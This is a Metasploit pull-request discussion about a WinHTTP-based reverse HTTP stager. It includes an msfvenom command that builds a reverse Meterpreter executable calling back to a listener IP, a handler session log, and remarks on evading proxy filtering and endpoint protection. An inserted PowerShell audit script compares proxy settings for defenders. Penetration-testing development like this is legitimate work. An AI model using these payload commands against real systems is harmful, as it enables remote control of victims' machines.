HTTP stager based on WinHttp #4608

Closed
wants to merge 2 commits into from

Conversation

BorjaMerino
Contributor

This is an adaptation from the @hmoore-r7 stager (based on WinINET) to WinHTTP; useful to bypass a lot of filtering.
I will create another PR for the HTTPS version since I'm getting some errors I have to solve first.

Tested in Win 7 32/64

E.g.:
./msfvenom -p windows/meterpreter/reverse_winhttp_http LHOST=192.168.1.34 LPORT=8080 -f exe >winhttp8080.exe

C:\>netsh winhttp import proxy source =ie

Configuración actual del proxy WinHTTP:

    Servidores proxy:  192.168.1.34:3128
    Lista de omisión    :  (ninguna)

msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > set lhost 192.168.1.34
lhost => 192.168.1.34
msf exploit(handler) > exploit

[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[*] Starting the payload handler...
[*] 192.168.1.34:36763 Request received for /sLXE...
[*] 192.168.1.34:36763 Staging connection for target /sLXE received...
[*] Meterpreter session 1 opened (192.168.1.34:8080 -> 192.168.1.34:36763) at 2015-01-19 12:52:58 +0100

meterpreter > getproxy 
Auto-detect     : No
Auto config URL : 
Proxy URL       : 192.168.1.34:3128
Proxy Bypass    :

@BorjaMerino
Contributor Author

Oops! Need to update spec/modules/payloads_spec.rb ...

@thelightcosine

@BorjaMerino when you say useful for bypassing filtering do you mean recognition of the payload itself, or that somehow WinHTTP actually helps you bypass filtering of the traffic?

@thelightcosine thelightcosine self-assigned this Jan 20, 2015
@BorjaMerino
Contributor Author

@dmaloney-r7 I did not explain myself very well, sorry. I mean that the payload could be useful for certain scenarios. For example, a server where all outbound traffic is blocked except for the WinHTTP default proxy settings (which are not based on the WinINet proxy settings).
Since many services rely on WinHTTP (for example Windows Update to download patches), it is likely that using these settings we could reach the handler.
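The scenario in that comment is also an audit question for a defender: a host whose machine-wide WinHTTP proxy is configured independently of the user's WinINet (Internet Options) proxy. The PowerShell script below is an added example, not code from this PR or from Metasploit; it reports both settings side by side and warns when only the WinHTTP one is set. It assumes `netsh winhttp show proxy` prints its proxy line in the English ("Proxy Server(s)") or Spanish ("Servidores proxy") form seen in this thread, and it reads the standard WinINet per-user values `ProxyEnable` and `ProxyServer` from the registry.

```powershell
# Added example: compare the machine-wide WinHTTP proxy with the per-user
# WinINet proxy, since the two stores are independent (the point made in
# the discussion above). Assumes English or Spanish netsh output.

function Get-WinHttpProxy {
    # netsh prints "Direct access (no proxy server)." when nothing is set,
    # in which case the pattern below does not match and $null is returned.
    $out = (& netsh winhttp show proxy 2>&1) | Out-String
    $pattern = '(?:Proxy Server\(s\)|Servidores proxy)\s*:\s*(\S+)'
    if ($out -match $pattern) { return $Matches[1] }
    return $null
}

function Get-WinInetProxy {
    # Per-user WinINet settings; ProxyEnable must be 1 for ProxyServer to apply.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($p -and $p.ProxyEnable -eq 1 -and $p.ProxyServer) { return $p.ProxyServer }
    return $null
}

function Compare-ProxyStores {
    $winhttp = Get-WinHttpProxy
    $wininet = Get-WinInetProxy

    $report = [pscustomobject]@{
        WinHTTP = if ($winhttp) { $winhttp } else { '(none)' }
        WinINet = if ($wininet) { $wininet } else { '(none)' }
    }
    $report | Format-List

    # The case the thread describes: WinHTTP clients can reach a proxy that
    # egress rules written against the WinINet setting do not account for.
    if ($winhttp -and -not $wininet) {
        Write-Warning ("Machine-wide WinHTTP proxy '{0}' is set while the user's WinINet proxy is not; " +
                       "egress rules that only consider Internet Options will not cover WinHTTP clients.") -f $winhttp
    }
    return $report
}

Compare-ProxyStores
```

Run it in an elevated session if you also want to change the WinHTTP setting afterwards (`netsh winhttp reset proxy`); reading it needs no elevation. The registry path is per user, so run the comparison as each interactive user of interest, not only as the administrator.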

@hdm
Contributor

hdm commented Jan 20, 2015

WinInet is filtered by endpoint protection products as well (where WinHTTP may not be).

@hdm
Contributor

hdm commented Jan 20, 2015

@BorjaMerino the staging is part of it, but we would need to implement a WinHTTP transport for meterpreter for that test case to be valid (in the example above, the stager is using WinHTTP but the payload is using WinInet).

@BorjaMerino
Contributor Author

@hmoore-r7 yes, of course. I did not find any stage working with WinHTTP, so I used meterpreter just to show that the stager works. In the meantime, the stager could be useful if someone has their own reflective DLL/stage using WinHTTP.

@thelightcosine

@BorjaMerino the stager works well on windows 7, but crashes on XP

@BorjaMerino
Contributor Author

@dmaloney-r7 thank you for testing. Could you give me more info about the crash? If I remember well, I also checked it on XP SP3.

@thelightcosine

@BorjaMerino NO! you must suffer my terrible bug report and try to glean some meaning from it! =)

Sorry, tested on Windows XP SP0, English.
Tested with both psexec and ms08-067.
I can send you a zip with the crash dump if you'd like.

@kernelsmith
Contributor

XP SP0, dear god, nothing works on that ;)


@thelightcosine

@kernelsmith aside from all of our other stagers and payloads you mean?

@BorjaMerino
Contributor Author

@dmaloney-r7 xDDDD I will try it with SP0. Thank you :)

@kernelsmith
Contributor

No, not what I meant.


@BorjaMerino
Contributor Author

@dmaloney-r7 sorry for the delay :p.
Windows XP SP0 does not support WinHTTP 5.1. Take a look at this information from Microsoft (https://msdn.microsoft.com/en-us/library/windows/desktop/aa384276%28v=vs.85%29.aspx):

With version 5.1, WinHTTP is an operating-system component of the following operating systems:
Windows 2000, Service Pack 3 and later (except Datacenter Server)
Windows XP with Service Pack 1 (SP1) and later
Windows Server 2003 with Service Pack 1 (SP1) and later

@hdm hdm assigned hdm and unassigned thelightcosine Mar 8, 2015
@hdm
Contributor

hdm commented Mar 8, 2015

Grabbing this one because it lines up with some other planned work. We have too many HTTP stagers right now and I plan to consolidate these into newer "complex" payloads that are runtime configurable. This PR is a great start on WinHTTP support, but doesn't support SSL, nor the other use cases (proxy, proxy pstore, etc). It would make more sense to combine this into a bigger effort.

@hdm
Contributor

hdm commented Mar 8, 2015

Marking delayed since this is part of #4895

@hdm hdm added the blocked Blocked by one or more additional tasks label Mar 8, 2015
@hdm
Contributor

hdm commented Mar 10, 2015

@BorjaMerino I am using this PR as a base for WinHTTP stagers. You can follow the development on my branch. Thank you for your work on this, I will close out this PR once the new one is ready for testing.

@BorjaMerino
Contributor Author

@hmoore-r7 you are super welcome :)

@hdm
Contributor

hdm commented Mar 10, 2015

Putting this on hold until #4904 is merged, since I plan to reuse the blockapi/exitfunk code from that changeset.

@hdm
Contributor

hdm commented Mar 12, 2015

Replaced by #4914

@hdm hdm closed this Mar 12, 2015
Labels: blocked (Blocked by one or more additional tasks), feature, module, tests